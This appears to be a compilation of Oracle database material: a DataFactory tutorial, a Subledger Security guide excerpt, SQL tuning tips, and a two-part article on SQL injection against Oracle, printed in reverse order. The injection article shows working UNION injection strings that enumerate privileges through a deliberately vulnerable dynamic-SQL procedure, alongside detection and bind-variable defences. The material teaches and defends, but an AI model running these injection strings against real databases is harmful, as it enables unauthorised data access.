Prior to creating the tables, you may want to create a separate schema in your database. Using Oracle10g, I created a user/schema owner named quest (granting connect and resource will be sufficient). You will be prompted for a username/password combination and database information.

So, following Tools>Create Tutorial Obects –

- the Tutorial Setup Wizard appears (with its own version of the Oracle logo).

A list of tables appears on the Finish Page.

Upon successful creation, DataFactory tells you so.

The project folder appears in the left frame

Click the Run button on the main menu. The ORA-02291 integrity constraint violated error will appear quite a few times (some tables more than once) because the loaded data in a foreign key-designated column does not correspond with data in a parent table. Almost all of the constraints use the SYS_Cxxxxxx naming structure, meaning they are not explicitly named.

To work around the integrity constraint violation, you can disable the constraint (once you know which table to alter). The query and ALTER TABLE statement below show one method to identify and disable the problem constraint.

SQL> select owner, constraint_name, table_name, column_name
  2  from all_cons_columns
  3  where constraint_name like '%9814%';
OWNER CONSTRAINT_NAME                TABLE_NAME           COLUMN_NAME   
----- ------------------------------ -------------------- ------------
QUEST SYS_C009814                    DF_ORDERS            CUSTID        
SQL> alter table df_orders
  2  disable constraint sys_c009814;
Table altered.

The Results window showing that your project-named script has completed successfully means we are ready to start looking around at what was created.

Instead of analyzing each table one at a time, use the DBMS_STATS built-in (which Oracle recommends to use for most analyze operations). If you are using Oracle10g, you may want to add a WHERE dropped=’NO’ to prevent dropped tables from appearing in queries on user_tables or tab (as an example).

SQL> execute dbms_stats.gather_schema_stats('QUEST');
PL/SQL procedure successfully completed.
SQL> select table_name, num_rows
  2  from user_tables
  3  where dropped='NO';
TABLE_NAME             NUM_ROWS
-------------------- ----------
DF_TITLES                   100
DF_MOVIE_CUSTOMER          1100
DF_MOVIE_EMPLOYEE           900
DF_DUMMY                   1100
DF_AUTHORS_TITLES          1100
DF_MOVIE_RENTAL             700
DF_PRODUCTS                 100
DF_MOVIE_TAPE               400
DF_CUSTOMERS               1100
DF_AUTHORS                 1100
DF_MOVIE_DISTRICT          1100
DF_ORDERS                   101
DF_MOVIE_MOVIE              900
DF_ORDERDETAILS             200
DF_MOVIE_STORE              500
15 rows selected.

Back in the project hierarchy or list of tables, selecting a table in the list will show its columns and their datatypes (you may have to toggle between the Children and Results tabs at the bottom of the application).

Using the DF_MOVIE_CUSTOMER table as an example, how does its data look? The “random characters” option definitely produces exactly that.

More on the Tutorial Tables

Are there any indexes on the foreign key columns?

SQL> select index_name, table_name, column_name, column_position
  2  from user_ind_columns;
INDEX_NAME   TABLE_NAME           COLUMN_NAME          COLUMN_POSITION
------------ -------------------- -------------------- ---------------
SYS_C009823  DF_MOVIE_DISTRICT    DISTRICTID                         1
SYS_C009827  DF_MOVIE_STORE       STOREID                            1
SYS_C009830  DF_MOVIE_EMPLOYEE    EMPID                              1
SYS_C009837  DF_MOVIE_CUSTOMER    CUSTID                             1
SYS_C009841  DF_MOVIE_MOVIE       MOVIEID                            1
SYS_C009845  DF_MOVIE_TAPE        TAPEID                             1
SYS_C009850  DF_MOVIE_RENTAL      TAPEID                             1
SYS_C009850  DF_MOVIE_RENTAL      CUSTID                             2
SYS_C009850  DF_MOVIE_RENTAL      RENTDATE                           3
SYS_C009810  DF_CUSTOMERS         CUSTID                             1
SYS_C009813  DF_ORDERS            ORDERID                            1
SYS_C009816  DF_PRODUCTS          PRODUCTID                          1
SYS_C009819  DF_ORDERDETAILS      ORDERID                            1
SYS_C009819  DF_ORDERDETAILS      PRODUCTID                          2
14 rows selected.

What does the output suggest? You can immediately identify the fact that for one, not every table has a primary key. There are 15 tables, but only 14 rows (or 11 distinct tables as some indexes are composites). Why do we know this? Because one of the benefits of creating a primary key is that you get an index for free. If you disabled all of the referential integrity constraints that arise in the load script, what else might you suspect?

Oracle recommends indexing foreign key columns as they are frequently used in joins, and the general rule is to index columns used in WHERE clauses (which is obviously where joins are listed). Given the lack of indexes, your suspicion should be that the “create table” component of the tutorial tables does not index foreign key columns.

The query below shows the table name/column name foreign keys (they all have position 1 meaning only a single column was used).

SQL> select a.constraint_name, b.constraint_type, 
  2  a.table_name, a.column_name
  3  from user_cons_columns a, all_constraints b
  4  where a.constraint_name=b.constraint_name
  5  and constraint_type = 'R';
CONSTRAINT_NAME  C TABLE_NAME           COLUMN_NAME
---------------- - -------------------- -------------
SYS_C009831      R DF_MOVIE_EMPLOYEE    SUPERVISORID
SYS_C009828      R DF_MOVIE_STORE       DISTRICTID
SYS_C009821      R DF_ORDERDETAILS      PRODUCTID
SYS_C009820      R DF_ORDERDETAILS      ORDERID
DFMOVIESTOREFK2  R DF_MOVIE_STORE       MANAGERID
SYS_C009852      R DF_MOVIE_RENTAL      TAPEID
SYS_C009851      R DF_MOVIE_RENTAL      CUSTID
SYS_C009838      R DF_MOVIE_CUSTOMER    STOREID
SYS_C009814      R DF_ORDERS            CUSTID
SYS_C009846      R DF_MOVIE_TAPE        MOVIEID
DFMOVIEEMPFK2    R DF_MOVIE_EMPLOYEE    STOREID
11 rows selected.

The end result? Suspicion confirmed; the foreign keys were not indexed.

From a management or maintenance perspective, why are only two of the referential integrity constraints explicitly named while the rest are system named? As it turns out, of the 51 constraints in this schema, these happen to be the only two user named constraints.

In Closing

The key point to take away from this exploration of a tool such as DataFactory is that while the tool (or a script you create) can generate millions of rows of test or sample data, what good is any of it if it misses the boat on referential integrity or other best practices with respect to data modeling? If you are trying to tune queries for an application, the test data needs to reflect how the application uses it. If you are relying on referential integrity, your test data needs to support and honor parent table-child table relationships.

From a design standpoint, two best practices that were violated include failure to index foreign key columns, and failure to explicitly name three major items (primary keys, foreign keys, and indexes). A possible third violation concerns not having a primary key on every table. Does every table in a schema require a primary key? No, but for the most part, every table (to support normalization) should, and if not, you should at least know why. Put another way, to not normalize a table should be a conscious decision, not an oversight.

SLS: Subledger Security

Overview
Subledger Security is not to be associated with other products within the Oracle
Public Sector Financials (International) suite.
Subledger Security is designed to be used as a tool by the systems administrator or
database administrator, rather than as a standard end-user product. Subledger
security is a requirement that is primarily a technical implementation of a business
security policy.
WARNING: Subledger Security must be implemented and maintained only when
end-users are not using Oracle Applications, for example, during system downtime.
This is because Subledger Security works at the Oracle database table level.
Subledger Security is not supported if Subledger Security is implemented or
maintained when end-users are using an Oracle product.

Subledger Security is based on two principles as follows:
 application context
 fine grained security

Subledger Security is an addition to Oracle Applications and is transparent to the
end-user after implementation.
Standard Oracle Application features and processes are not altered or extended
because Subledger Security is implemented and maintained through a set of
standalone windows and reports.

Features
The following features are available in Subledger Security:
 Data Management
 Data Security
 Data Security Auditing
 Reports
Data management and data security are conceptually separate business
requirements but are closely related to, and are physically indistinguishable within
the implementation of Subledger Security.
Data Management
Subledger security facilitates management of transactions. In the Oracle
Applications multiple organizations architecture, it provides a lower organizational
level.
Overview

Users can view transactions belonging to their own business units.
Data Security
Subledger Security enables transactions to be viewed by the business unit from
which they originated and not by any other business unit. Users belonging to a
business unit can view and modify transactions entered by users belonging to their
business unit only. There is also a top level central business unit that can view all
business unit transactions. Users belonging to this central business unit can view
transactions belonging to all business units.
Table 89–1, page 89-4 describes the data management and data security windows
and concurrent programs available in Subledger Security.
Data Security Auditing
Subledger Security provides an audited history of the major control actions that can
be performed on the main business entities as follows:
 enable security
 re-enable security
Table 89–1 Data Management and Data Security Windows and Concurrent Programs
Object Type Purpose
Maintain Tables Window Specify all Oracle Financials
database tables that require
security and need allocating
to security groups.
Maintain Groups Window Specify all required security
groups and process groups.
Maintain Allocations Window Allocate and maintain
required Oracle database
tables and process groups to a
security group. Allocate and
maintain Oracle database
tables belonging to a process
group.
Apply Security Concurrent Program Apply security policy as
required.
Security Group
Consolidations
Window Consolidate or merge security
groups.
Overview
Subledger Security Process 89-5
 disable security
 delete security
The audited history enables an organization’s business analyst and systems
administrator to recognize and reconcile the history profile of secured database
tables. Auditing history is accessible through window or report based inquiry.
Reports
A comprehensive set of reports supports implementation and maintenance of
Subledger Security. The Subledger Security reports provide information on the
current and previous state of Subledger Security objects and the organization’s
security structure, as shown in Table 89–2, page 89-5.
Table 89–2 Subledger Security Reports
Report Purpose
Subledger Security: Group
Status Report
Provides a list of groups and descriptions. Displays current
enabled date.
Subledger Security: Secure
Tables Status Report
Lists all tables defined as secure by the user, and displays the
current status.
Subledger Security: Group
Secure Tables Report
Lists all tables currently secured for each security group.
Subledger Security:
Allocation Status Report
This report lists the following information: process groups and
the secure tables allocated to them; security groups; allocated
process groups and secure tables with the enabled or disabled
status. This report shows all historic data and can be run for a
given subledger security group, a process group, or a secure
table.
Subledger Security: Object
Status Report
Displays status of subledger security objects for each secure
table. The report lists all corresponding subledger security
table names, the policy on the secure table, the policy function
used by the policy, and the database trigger on the secure
table.
Subledger Security: User
Allocation Status Report
Lists security groups with associated application users and
responsibilities.
Subledger Security:
Security Group
Consolidations Report
Provides information relating to security group consolidations
and enables an organization to reconcile business unit
structure changes. Displays source security groups
consolidated in the parent security group and historical
information.
Overview
89-6 Oracle Public Sector Financials (International) User’s Guide
Supported Products
Subledger Security is supported for the following Oracle Supply Chain and Oracle
Financials modules:
 Purchasing
 Payables
 Receivables

Tuning Oracle SQL

Some method for tuning SQL collected:

How to Develop efficient Sql Statements-SQL Tuing

1)Verify Optimizer Statistics:
——————————————–

The query optimizer uses statistics gathered on tables and indexes when determining the optimal execution plan. If these statistics have not been gathered, or if the statistics are no longer representative of the data stored within the database, then the optimizer does not have sufficient information to generate the best plan.

So, gather statistics of all tables that are involved in SQL statements. You can check whether your statistics is up to date or not by querying
SELECT COUNT(*) FROM table_name;
and,
select NUM_ROWS from dba_tables where table_name=’TABLE_NAME’;

If they are almost same then you have correct optimizer statistics. If they don’t match then gather new statistics.

2)Review the Execution Plan:
—————————————
When tuning (or writing) a SQL statement, the goal is to drive from the table that has the most selective filter. This means that there are fewer rows passed to the next step. If the next step is a join, then this means that fewer rows are joined. Check to see whether the access paths are optimal.

We can check it by examine the optimizer execution plan following,

•The plan is such that the driving table has the best filter.

•The join order in each step means that the fewest number of rows are being returned to the next step (that is, the join order should reflect, where possible, going to the best not-yet-used filters).

•The join method is appropriate for the number of rows being returned. For example, nested loop joins through indexes may not be optimal when many rows are being returned.

•Views are used efficiently. Look at the SELECT list to see whether access to the view is necessary.

•There are any unintentional Cartesian products (even with small tables).

•Each table is being accessed efficiently:

-Consider the predicates in the SQL statement and the number of rows in the table. Look for suspicious activity, such as a full table scans on tables with large number of rows, which have predicates in the where clause. Determine why an index is not used for such a selective predicate.

-A full table scan does not mean inefficiency. It might be more efficient to perform a full table scan on a small table, or to perform a full table scan to leverage a better join method (for example, hash_join) for the number of rows returned.

If any of these conditions are not optimal, then consider restructuring the SQL statement or the indexes available on the tables.

3)Restructuring the SQL Statements
———————————————-

Often, rewriting an inefficient SQL statement is easier than modifying it. If you understand the purpose of a given statement, then you might be able to quickly and easily write a new statement that meets the requirement.

While restructuring the SQL statements keep in mind of the following issues.

•Use equijoins whenever possible.
That is compose predicate using AND and =.

•Avoid Transformed Columns in the WHERE Clause.
That is use
a=b instead of to_number(a)=to_number(b)

When you need to use SQL functions on filters or join predicates, do not use them on the columns on which you want to have an index; rather, use them on the opposite side of the predicate, as in the following statement; if you have index on varcol

TO_CHAR(numcol) = varcol

rather than

varcol = TO_CHAR(numcol)

•Write Separate SQL Statements for Specific Tasks.
SQL is not a procedural language. Using one piece of SQL to do many different things usually results in a less-than-optimal result for each task. If you want SQL to accomplish different things, then write various statements, rather than writing one statement to do different things depending on the parameters you give it.

It is always better to write separate SQL statements for different tasks, but if you must use one SQL statement, then you can make a very complex statement slightly less complex by using the UNION ALL operator.

•Use of EXISTS versus IN for Subqueries.
In certain circumstances, it is better to use IN rather than EXISTS. In general, if the selective predicate is in the subquery, then use IN. If the selective predicate is in the parent query, then use EXISTS.

4)Controlling the Access Path and Join Order with Hints
————————————————————————————–

You can use hints in SQL statements to instruct the optimizer about how the statement should be executed. Hints, such as /*+FULL */ control access paths.

Join order can have a significant effect on performance. The main objective of SQL tuning is to avoid performing unnecessary work to access rows that do not affect the result. This leads to three general rules:

•Avoid a full-table scan if it is more efficient to get the required rows through an index.

•Avoid using an index that fetches 10,000 rows from the driving table if you could instead use another index that fetches 100 rows.

•Choose the join order so as to join fewer rows to tables later in the join order.

•Be careful when joining views, when performing outer joins to views, and when reusing an existing view for a new purpose.

•Joins to complex views are not recommended, particularly joins from one complex view to another. Often this results in the entire view being instantiated, and then the query is run against the view data.

•Beware of writing a view for one purpose and then using it for other purposes to which it might be ill-suited. Querying from a view requires all tables from the view to be accessed for the data to be returned. Before reusing a view, determine whether all tables in the view need to be accessed to return the data. If not, then do not use the view. Instead, use the base table(s), or if necessary, define a new view. The goal is to refer to the minimum number of tables and views necessary to return the required data.

•An outer join within a view is problematic because the performance implications of the outer join are not visible.

•Consider using materialized views.


5)Restructuring the Indexes
———————————————–

Often, there is a beneficial impact on performance by restructuring indexes. This can involve the following:

Remove nonselective indexes to speed the DML.
Index performance-critical access paths.
Consider reordering columns in existing concatenated indexes.
Add columns to the index to improve selectivity.

6)Modifying or Disabling Triggers and Constraints
———————————————————–

Using triggers consumes system resources. If you use too many triggers, then you can find that performance is adversely affected and you might need to modify or disable them.

7)Restructuring the Data
—————————————–

After restructuring the indexes and the statement, you can consider restructuring the data.

Introduce derived values. Avoid GROUP BY in response-critical code.

Review your data design. Change the design of your system if it can improve performance.

Consider partitioning, if appropriate.

8)Combine Multiples Scans with CASE Statements
———————————————————–

Often, it is necessary to calculate different aggregates on various sets of tables. Usually, this is done with multiple scans on the table, but it is easy to calculate all the aggregates with one single scan. Eliminating n-1 scans can greatly improve performance.

9)Maintaining Execution Plans Over Time
——————————————————-

You can maintain the existing execution plan of SQL statements over time either using stored statistics or stored SQL execution plans. Storing optimizer statistics for tables will apply to all SQL statements that refer to those tables. Storing an execution plan (that is, plan stability) maintains the plan for a single SQL statement. If both statistics and a stored plan are available for a SQL statement, then the optimizer uses the stored plan.

SQL Injection and Oracle, Part Two

This is the second part of a two-part article that will examine SQL injection attacks against Oracle databases. The first installment offered an overview of SQL injection and looked at how Oracle database applications are vulnerable to this attack, and looked at some examples. This segment will look at enumerating the privileges, detecting SQL injection attacks, and protecting against SQL injection.

Enumerating the Privileges

Access to SQL inject an Oracle database is great, but what would an attacker look for to gain an advantage or a potential step up. He would, of course, need to enumerate the user he had access to and see what that user can see and do. I will show a few examples here to give the reader an idea of what is possible.

In this example, we are logged in as the user dbsnmp and the get_cust procedure has been modified to select three columns from our sample table. If we use a union to extend an existing select statement then the new SQL in the union must select the same number of columns and data types as the existing hijacked select otherwise an error occurs, see the following:

SQL> exec get_cust('x'' union select 1,''Y'' from sys.dual where ''x''=''x');
debug:select customer_phone,customer_forname,customer_surname from customers
where customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x'
-1789ORA-01789: query block has incorrect number of result columns

The main select has three varchar columns but we select two columns and one is a number; as a result, an error occurs. Back to enumeration, first get the objects that the user we are logged in as can see:

SQL> exec get_cust('x'' union select object_name,object_type,''x'' from user_obj
ects where ''x''=''x');
debug:select customer_phone,customer_forname,customer_surname from customers
where customer_surname='x' union select object_name,object_type,'x' from
user_objects where 'x'='x'
::CUSTOMERS:TABLE:x
::DBA_DATA_FILES:SYNONYM:x
::DBA_FREE_SPACE:SYNONYM:x
::DBA_SEGMENTS:SYNONYM:x
::DBA_TABLESPACES:SYNONYM:x
::GET_CUST:PROCEDURE:x
::GET_CUST2:PROCEDURE:x
::GET_CUST_BIND:PROCEDURE:x
::PLSQ:DATABASE LINK:x

Then get the roles that have been allocated directly to the user:

SQL> exec get_cust('x'' union select granted_role,admin_option,default_role from
 user_role_privs where ''x''=''x');
debug:select customer_phone,customer_forname,customer_surname from customers
where customer_surname='x' union select granted_role,admin_option,default_role
from user_role_privs where 'x'='x'
::CONNECT:NO:YES
::RESOURCE:NO:YES
::SNMPAGENT:NO:YES

Then find out the system privileges that are granted directly to the user:

SQL> exec get_cust('x'' union select privilege,admin_option,''X'' from user_sys_
privs where ''x''=''x');
debug:select customer_phone,customer_forname,customer_surname from customers
where customer_surname='x' union select privilege,admin_option,'X' from
user_sys_privs where 'x'='x'
::CREATE PUBLIC SYNONYM:NO:X
::UNLIMITED TABLESPACE:NO:X

Selecting from the table USER_TAB_PRIVS will give the privileges granted directly to the user on objects. There are many system views that start USER_%, these show objects and privileges that are granted to the current user as well as details about objects owned by the user. For instance, there are 168 views or tables in Oracle 8.1.7, so this gives an indication of the amount of detail that can be learned about the user you are logged in as. These USER_% views do not include all the many privileges and options available to the current user; however, besides those specifically granted, any user also can include all of the objects that have permissions granted to PUBLIC.

PUBLIC is a catch-all that is available to all users in the Oracle database. There is a good set of views, known as the ALL_% views, that is similar in construction to the USER_% views. These include every item available to the current user, including PUBLIC ones. A good place to start is the view ALL_OBJECTS, as it has a similar structure to USER_OBJECTS and will display every object and its type available to the current user. A good query to see all of the objects, their types and owner available would be:

select count(*),object_type,owner
from all_objects
group by object_type,owner

The V$ views is also a good set of views, provided they are available to the user. These give information about the current instance, performance, parameters, and the like. V$PARAMETER, which gives all of the database instance initialization parameters, including details of the UTL_FILE directories is a good example. V$PROCESS and V$SESSION are another pair of views that will give details of current sessions and processes. These will tell the user who is logged on, where they are logged in from, and what program they are using, etc.

In conclusion to this exploration section it is worth mentioning that because I wanted to make easy examples that anyone with a copy of the Oracle RDBMS could try out, I used a PL/SQL procedure to demonstrate the techniques and obviously I had access to my source code. It made it easy for me to understand exactly the SQL I could send successfully without causing errors.

In the real world, in a Web-based environment, or in a network-based application, the source code would probably not be available. As a result, working out how to get successful SQL to send will probably require trial and error. If error messages are returned to the user either directly from the Oracle RDBMS or from the application, then it is usually possible to work out where to change the SQL. An absence of error messages makes it harder but not impossible. All of the Oracle error messages are quite well documented and are available on-line on a Unix system with the oerr command or with the HTML documentation provided with Oracle CDs on any platform. (Remember anyone can get a copy of Oracle to use to learn the product.) They are also on-line, along with the complete Oracle documentation, at http://tahiti.oracle.com/.

Having knowledge of Oracle and of the schema of the user being used is also a great advantage. Quite obviously, some of this knowledge is not hard to learn, so the lesson is that in case anyone is able to SQL inject into your database then you need to minimize what they can do, see, or access.

Detecting SQL Injection

Oracle is a large product and is applied in many diverse uses, so to say that SQL injection can be detected would be wrong; however, in some cases, it should be possible for the DBA or security admin to spot whether or not this technique is being used. If abuse is thought to be taking place then forensic investigations can be done using the redo logs. A GUI tool called Log Miner is available from Oracle to allow the redo logs to be analysed. However, this has serious restrictions: until version 9i, select statements could not be retrieved. The redo logs allow Oracle to replay all of the events that altered data in the database, this is part of the recovery functionality. It is possible to see all statements and data that has been altered. Two PL/SQL standard packages, DBMS_LOGMNR and DBMS_LOGMNR_D, are available, these packages allow the redo logs to be queried from the command line for all statements processed.

The extensive Oracle audit functionality can be utilized but, again, unless you know what you are looking for, finding evidence of SQL injection taking place could like finding a needle in a haystack. The principle of least privilege should be observed in any Oracle database so that only those privileges that are actually needed are granted to the application database users. This simplifies (minimizes) what can be legally done and, as a result, makes any actions outside the scope of these users easier to spot. For instance, if the application user should have access to seven tables and three procedures and nothing else, then using Oracle audit to record select failures on all other tables would enable an administrator to spot any attempted access to any table outside the applications realm. This can be done, for example, for one table with the following audit command:

SQL> audit select on dbsnmp.customers by access whenever not successful;

Audit succeeded.

A simple script can be built to generate the audit statements for the tables needed. There should be no real performance issues with this audit, as no other tables should be accessed by the application. As a result, it should not therefore generate audit. Of course, if someone successfully accesses a table outside the realm, it would not be captured. This is merely intended as a first step.

The same audit principles can be used to audit DDL, inserts and update failures or successes. The new SANS guide (see references) has a whole chapter on audit.

Another idea could be to watch the SQL executed and look for any dodgy SQL. A good script called peep.sq can be used to access the SQL executed from the SGA is one called from http://www.oriole.com/frameindexSA.html, search down the list of free scripts and get it. The script gives the SQL statements in the SGA with the worst performance times. It can be easily modified to remove the execution time restraints and bring back all SQL in the SGA. A script such as this can be scheduled on a regular basis and then the SQL that is returned can be used to guess if any SQL injection has been attempted. I say “guess” because it is virtually impossible to know all legal pieces of SQL an application generates; therefore, the same applies to spotting illegal ones. A good first step would be to identify all statements with “union” included or or statements with ‘x’=’x’ type lines. There could be performance issues with extracting all of the SQL from the SGA regularly!

The best cure of course is prevention!

Protecting against SQL Injection

On the surface, protection against SQL injection appears to be easy to implement but, in fact, it is not as easy as it looks. The solutions fall into two distinct areas:

  • Do not allow dynamic SQL that uses concatenation, or at least filter the input values and check for special characters such as quote symbols.
  • Use the principle of least privilege and ensure that the users created for the applications have the privileges needed and all extra privileges (such as PUBLIC ones) are not available.

This section cannot go into great detail; such a discussion would constitute an entire article in itself. However, certain basic measures can be taken. These actions fall into two sections:

  • Review the application source code. The code can be written in many different languages, such as PHP, JSP, java, PL/SQL VB, etc., so the solutions vary. However, they all follow a similar pattern. Review the source code for dynamic SQL where concatenation is used. Find the call that parses the SQL or executes it. Check back to where values are entered. Ensure that input values are validated and that quotes are matched and metacharacters are checked. Reviewing source code is a task that is specific to the language used.
  • Secure the database and ensure that all excess privileges are revoked.

Some other simple tips to follow include:

  • If possible, do not use dynamic PL/SQL. The potential for damage is much greater than for dynamic SQL, as then there is scope to execute any SQL, DDL, PL/SQL etc.
  • If dynamic PL/SQL is necessary then use bind variables.
  • If PL/SQL is used use AUTHID CURRENT_USER so that the PL/SQL runs as the logged in user and not the creator of the procedure, function or package.
  • If concatenation is necessary then use numeric values for the concatenation part. This way strings cannot be passed in to add SQL.
  • If concatenation is necessary then check the input for malicious code, i.e. check for union in the string passed in or metacharacters such as quotes.
  • For dynamic SQL if it is necessary use bind variables. An example is shown below:

We first need to alter our simple procedure to allow the dynamic part passed in to use a bind variable. This is shown here:

create or replace procedure get_cust_bind (lv_surname in varchar2)
is
        type cv_typ is ref cursor;
        cv cv_typ;
        lv_phone        customers.customer_phone%type;
        lv_stmt         varchar2(32767):='select customer_phone '||
                                'from customers '||
                                'where customer_surname=:surname';
begin
        dbms_output.put_line('debug:'||lv_stmt);
        open cv for lv_stmt using lv_surname;
        loop
                fetch cv into lv_phone;
                exit when cv%notfound;
                dbms_output.put_line('::'||lv_phone);
        end loop;
        close cv;
exception
        when others then
                dbms_output.put_line(sqlcode||sqlerrm);
end get_cust_bind;
/

First we execute with a genuine value, in this case “Clark”, to show that the correct records are returned. We then we try to SQL inject this procedure and find it doesn’t work:

SQL> exec get_cust_bind('Clark');
debug:select customer_phone from customers where customer_surname=:surname
::999444888
::999777888

PL/SQL procedure successfully completed.

SQL> exec get_cust_bind('x'' union select username from all_users where ''x''=''
x');
debug:select customer_phone from customers where customer_surname=:surname

Some more pointers:

  • Encrypt sensitive data so that it cannot be viewed.
  • Revoke all PUBLIC privileges where possible from the database
  • Do not allow access to UTL_FILE, DBMS_LOB, DBMS_PIPE, DBMS_OUTPUT, UTL_HTTP,UTL_SMTP or any other standard or application packages that allow access to the O/S.
  • Change database default passwords.
  • Run the listener as a non-privileged user.
  • Ensure that minimum privileges are granted to application users.
  • Restrict PL/SQL packages that can be accessed from apache.
  • Remove all example scripts and programs from the Oracle install.

Final thoughts

I hope that this article has given an overview of some of the possibilities of SQL injecting Oracle and done so with simple examples that most readers can try. Again, SQL injection is a relatively simple technique and on the surface protecting against it should be fairly simple; however, auditing all of the source code and protecting dynamic input is not trivial, neither is reducing the permissions of all applications users in the database itself. Be vigilant, grant what is needed, and try and reduce dynamic SQL to the minimum.

SQL Injection and Oracle, Part One(Pete Finnigan)

SQL Injection and Oracle, Part One
Pete Finnigan 2002-11-21

SQL Injection and Oracle, Part One
by Pete Finnigan
last updated November 21, 2002


SQL injection techniques are an increasingly dangerous threat to the security of information stored upon Oracle Databases. These techniques are being discussed with greater regularity on security mailing lists, forums, and at conferences. There have been many good papers written about SQL Injection and a few about the security of Oracle databases and software but not many that focus on SQL injection and Oracle software. This is the first article in a two-part series that will examine SQL injection attacks against Oracle databases. The objective of this series is to introduce Oracle users to some of the dangers of SQL injection and to suggest some simple ways of protecting against these types of attack.

Oracle is a huge product and SQL injection can be applied to many of its modules, languages and APIs, so this paper is intended to be an overview or introduction to the subject. This two-part series is not intended as a detailed treatise of how to SQL inject an Oracle database, nor is it intended as a detailed discussion on the finer points of the technique in general. (Details of SQL injection techniques have been covered admirably in the past for other languages and databases, particularly by Rain Forest Puppy who pioneered the subject. Some of these papers are included in the reference section at the end of this paper.) Rather, I have designed this paper so that as many readers as possible can try out the examples. To achieve this I have used a PL/SQL procedure that uses dynamic SQL to demonstrate the techniques of SQL injection from the ubiquitous SQL*Plus.

Prior to commencing our discussion, it may be useful for readers to know that all of the code from this paper is available from the author’s Web site at http://www.petefinnigan.com from the scripts menu – SQL and PL/SQL option..

What is SQL Injection

SQL Injection is a way to attack the data in a database through a firewall protecting it. It is a method by which the parameters of a Web-based application are modified in order to change the SQL statements that are passed to a database to return data. For example, by adding a single quote (‘) to the parameters, it is possible to cause a second query to be executed with the first.

An attack against a database using SQL Injection could be motivated by two primary objectives:

  1. To steal data from a database from which the data should not normally be available, or to obtain system configuration data that would allow an attack profile to be built. One example of the latter would be obtaining all of the database password hashes so that passwords can be brute-forced.
  2. To gain access to an organisation’s host computers via the machine hosting the database. This can be done using package procedures and 3GL language extensions that allow O/S access.

There are many ways to use this technique on an Oracle system. This depends upon the language used or the API. The following are some languages, APIs and tools that can access an Oracle database and be part of a Web-based application.

  • JSP
  • ASP
  • XML, XSL and XSQL
  • Javascript
  • VB, MFC, and other ODBC-based tools and APIs
  • Portal, the older WebDB, and other Oracle Web-based applications and API’s
  • Reports, discoverer, Oracle Applications
  • 3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
  • Perl and CGI scripts that access Oracle databases
  • many more.

Any of the above applications, tools, and products could be used as a base from which to SQL inject an Oracle database. A few simple preconditions need to be in place first though. First and foremost amongst these is that dynamic SQL must be used in the application, tool, or product, otherwise SQL Injection is not possible.

The final important point not usually mentioned in discussions about SQL injection against any database including Oracle is that SQL injection is not just a Web-based problem. As is implied in the preceding paragraph, any application that allows a user to enter data that may eventually end up being executed as a piece of dynamic SQL can potentially be SQL injected. Of course, Web-based applications present the greatest risk, as anyone with a browser and an Internet connection can potentially access data they should not.

While second article of this series will include a much more in-depth discussion of how to protect against SQL injection attacks, there are a couple of brief notes that should be mentioned in this introductory section. Data held in Oracle databases should be protected from employees and others who have network access to applications that maintain that data. Those employees could be malicious or may simply want to read data they are not authorized to read. Readers should keep in mind that most threats to data held within databases come from authorized users.

Protecting against SQL Injection on Oracle-based systems is simple in principle and includes two basic stages. These are:

  1. Audit the application code and change or remove the problems that allow injection to take place. (These problems will be discussed at greater length in the second part of this series.)
  2. Enforce the principle of least privilege at the database level so that even if someone is able to SQL inject an application to steal data, they cannot see anymore data than the designer intended through any normal application interface.

The “Protection” section, which will be included in the second part of this series, will discuss details of how to apply some of these ideas specifically to Oracle-based applications.

How Can Oracle be Abused

Oracle is like any other database product and, as a result, is vulnerable to SQL injection attacks. While Oracle fairs slightly better than some of the others, the following abuses can be inflicted on an Oracle database:

  • UNIONS can be added to an existing statement to execute a second statement;
  • SUBSELECTS can be added to existing statements;
  • Existing SQL can be short-circuited to bring back all data. This technique is often used to gain access via third party-implemented authentication schemes;
  • A large selection of installed packages and procedures are available, these include packages to read and write O/S files;
  • Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string;
  • INSERTS, UPDATES and DELETES can also be injected; and,
  • Other databases can be injected through the first by using database links.

On the other hand, the following abuses are not possible:

  • Multiple statements are not allowed; and,
  • It is also not possible to SQL inject a call that uses bind variables; this is therefore a good solution to most of the SQL injection issues.

Some Specific Examples

Web-based applications constitute the worst threat of SQL injection. These can be written using JSP, ASP, or many of the other languages listed above. Some would argue that SQL injection is only an issue for Web-based applications and at this time this is probably true, as SQL injection is not a particularly well-established threat, especially with Oracle.

To illustrate some of the possibilities of SQL injection on Oracle, I have written a simple PL/SQL procedure that displays the phone number of customers from a hypothetical customer table in a database. As stated in the introduction, it is possible to inject into any piece of SQL that is dynamically built at run time where the input data is not filtered or checked, so it is possible to demonstrate SQL injection using PL/SQL and the ubiquitous tool SQL*Plus. The procedure uses native dynamic SQL to pass a run-time piece of SQL to the database. I decided to use PL/SQL and SQL*Plus so that any reader having access to Oracle can try out the samples, as no special tools are required other than to have an Oracle database greater than 8i installed. Using a PL/SQL procedure and dynamic SQL is identical in all respects to Web-based SQL injection except that it is local and not remote, readers should bear this in mind while reading through this paper. Also, because of this approach we do not use any character encoding techniques to pass special characters or metacharacters to the database server from a Web browser. The example table structure used is:

SQL> desc customers
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 CUSTOMER_FORNAME                                   VARCHAR2(30)
 CUSTOMER_SURNAME                                   VARCHAR2(30)
 CUSTOMER_PHONE                                     VARCHAR2(30)
 CUSTOMER_FAX                                       VARCHAR2(30)
 CUSTOMER_TYPE                                      NUMBER(10)

The table has been loaded with three records as follows:

SQL> select * from customers;

CUSTOMER_FORNAME               CUSTOMER_SURNAME
------------------------------ ------------------------------
CUSTOMER_PHONE                 CUSTOMER_FAX                   CUSTOMER_TYPE
------------------------------ ------------------------------ -------------
Fred                           Clark
999444888                      999444889                                  3

Bill                           Jones
999555888                      999555889                                  2

Jim                            Clark
999777888                      999777889                                  1

The sample procedure used is created with the following code. For these tests I have used the default user DBSNMP, who has many privileges that are not necessary for a general user. This user illustrates the problem of Web-based users being limited to least privilege:

create or replace procedure get_cust (lv_surname in varchar2)
is
        type cv_typ is ref cursor;
        cv cv_typ;
        lv_phone        customers.customer_phone%type;
        lv_stmt         varchar2(32767):='select customer_phone '||
                                        'from customers '||
                                        'where customer_surname='''||
                                        lv_surname||'''';
begin
        dbms_output.put_line('debug:'||lv_stmt);
        open cv for lv_stmt;
        loop
                fetch cv into lv_phone;
                exit when cv%notfound;
                dbms_output.put_line('::'||lv_phone);
        end loop;
        close cv;
end get_cust;
/

